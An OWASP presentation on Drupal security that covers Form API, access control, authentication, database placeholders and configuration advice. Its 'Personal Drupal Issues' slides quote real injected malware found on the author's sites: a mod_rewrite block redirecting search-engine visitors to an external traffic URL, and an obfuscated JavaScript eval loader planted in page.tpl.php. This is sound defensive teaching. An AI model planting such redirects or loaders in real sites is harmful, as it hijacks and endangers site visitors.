A Brief Analysis of Drupal Security


Andrew Welsh

21 Feb 2012

Presentation Overview

Introduction
What is Drupal
Secure Drupal Code
Drupal Configuration
Personal Drupal Issues
Conclusion

Introduction

whoami;

Andrew.welsh@owasp.org

What is Drupal

Drupal is a mature, open-source, PHP-based CMS and web application framework. The Drupal project is composed of two principal bodies of work:

(1) the Drupal core code base

(2) thousands of contributed modules and themes

What is Drupal

Sites that use Drupal: NASA, The Economist, Ubuntu, 20th Century Fox Searchlight, Warner Bros Recordings, United Nations – End Poverty 2015, Yahoo! Research, Amnesty International, OpenOffice Extensions, Popular Science, AOL Corporate, Nike, Beijing Olympics, White House

Secure Drupal Code

Form API:

<img src="http://test.com/index.php?delete=12" />

1) It requires the form to be loaded (and given a token) before a submission is accepted, making CSRF more difficult.

2) It validates and sanitizes data from form submissions, making XSS more difficult.

Secure Drupal Code

ACL - URL access

http://www.site.com/user/1/delete

1) The menu system handles permission checking:
user_access('administer nodes', $account)
node_access('edit', $node, $account)

2) drupal_goto() calls are checked so that they only redirect to internal destinations.

Secure Drupal Code

Authentication

1) User sessions are destroyed and recreated upon logging out and logging in.
2) Session IDs are changed when permissions change.
3) Auth cookies are not modifiable by site users.
4) Passwords are salted and hashed.

Secure Drupal Code

Database API - enforces security checks and good coding standards:

1) Bind parameters
2) Named placeholders
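The Form API, menu access and Database API points above, put together in a minimal Drupal 7 module. This is an added example, not code from the slides; the module name secdemo, the permission name and the table secdemo_item are assumed.

```php
<?php
// Added example (not from the slides). Assumed: module "secdemo" with a
// table {secdemo_item} that has an integer "id" column.

/**
 * Implements hook_menu().
 * The menu system checks "access arguments" before the page callback runs,
 * so a bare URL like /secdemo/12/delete is refused for unprivileged users.
 */
function secdemo_menu() {
  $items['secdemo/%/delete'] = array(
    'title' => 'Delete item',
    'page callback' => 'drupal_get_form',
    'page arguments' => array('secdemo_delete_form', 1),
    'access arguments' => array('administer secdemo items'),
    'type' => MENU_CALLBACK,
  );
  return $items;
}

/**
 * Implements hook_permission().
 */
function secdemo_permission() {
  return array(
    'administer secdemo items' => array('title' => t('Administer secdemo items')),
  );
}

/**
 * Confirmation form. Form API adds a per-session form token automatically,
 * so an <img src="...?delete=12"> request cannot trigger the deletion.
 */
function secdemo_delete_form($form, &$form_state, $id) {
  $form['id'] = array('#type' => 'value', '#value' => $id);
  return confirm_form($form, t('Delete item %id?', array('%id' => $id)), 'secdemo');
}

function secdemo_delete_form_validate($form, &$form_state) {
  // Validate the id before it reaches the query.
  if (!ctype_digit((string) $form_state['values']['id'])) {
    form_set_error('id', t('Invalid item id.'));
  }
}

function secdemo_delete_form_submit($form, &$form_state) {
  // Named placeholder: the value is bound by the driver, never concatenated.
  // Vulnerable form: db_query('DELETE FROM {secdemo_item} WHERE id = ' . $_GET['delete']);
  db_query('DELETE FROM {secdemo_item} WHERE id = :id',
    array(':id' => (int) $form_state['values']['id']));
  drupal_set_message(t('Item deleted.'));
  $form_state['redirect'] = 'secdemo';
}
```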

Drupal Configuration

1) Configure logging appropriately; never display log errors to users.
2) Never display DB connection strings.
3) Check the watchdog report.
4) Look at all administrator permissions.
5) Watch input formats for comments, etc.

Drupal Configuration (v5)

Drupal Configuration

Update Regularly!

Personal Drupal Issues

Public node access

Personal Drupal Issues

Injected mod_rewrite block that redirects visitors arriving via the listed referrers to an external URL:

#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio......sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://forumbeagle.cba.pl/store/traf.php [R=301,L]
</IfModule>
#/336988#

Personal Drupal Issues

JS injection in page.tpl.php

<script type="text/javascript" language="javascript">
try{window.document.body++}catch(gdsgsdg){dbshre=179;}
if(dbshre){
asd=0;
try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}
if(!asd){e=eval;}
ss=String;
asgq=new Array(31,94,110,104,94,107.........101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,93,113,99,93,100,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,93,113,99,93,100,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);
s="";
for(i=0;i-500!=0;i++){
if((020==0x10)&&window.document )s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));
}
z=s;e(s)
}
</script>

Conclusion

Personal Thoughts: Drupal is a very good, well-used, peer-reviewed CMS and the security aspect is well addressed. Always stay current with upgrades. Be careful with custom code (themes or modules); always peer review.

Thank You

Contact Info: Andrew.welsh@owasp.org

Sources: http://drupal.org/writing-secure-code

http://drupal.org/node/766404

http://drupal.org/security/secure-configuration

http://www.mediacurrent.com/blog/drupal-security-review

http://www.slideshare.net/fourkitchens/is-drupal-secure

http://drupalsecurityreport.org/sites/drupalsecurityreport.org/files/drupal-security-white-paper-1-1.pdf

http://drupal.org/documentation/is-drupal-secure

http://www.cameronandwilding.com/blog/pablo/10-most-critical-drupal-security-risks
